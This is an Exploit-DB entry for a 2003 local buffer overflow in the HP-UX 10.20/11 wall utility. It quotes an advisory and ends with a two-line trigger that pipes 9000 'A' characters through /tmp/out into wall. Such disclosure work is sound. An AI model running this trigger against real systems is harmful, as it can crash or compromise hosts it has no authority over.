HPUX 10.20/11 Wall Message - Local Buffer Overflow

EDB-ID:

22231


Author:

Scotty

Type:

local


Platform:

HP-UX

Date:

2003-02-07


source: https://www.securityfocus.com/bid/6800/info

It has been reported that the HPUX wall executable may be prone to a buffer overflow condition. This buffer overflow is alleged to be triggered when an excessive amount of data is redirected into wall as a message intended to be broadcast.

It may be possible for remote attackers to corrupt sensitive regions of memory with attacker-supplied values, possibly resulting in execution of arbitrary code.

perl -e 'print "A" x 9000' > /tmp/out
/usr/sbin/wall /tmp/out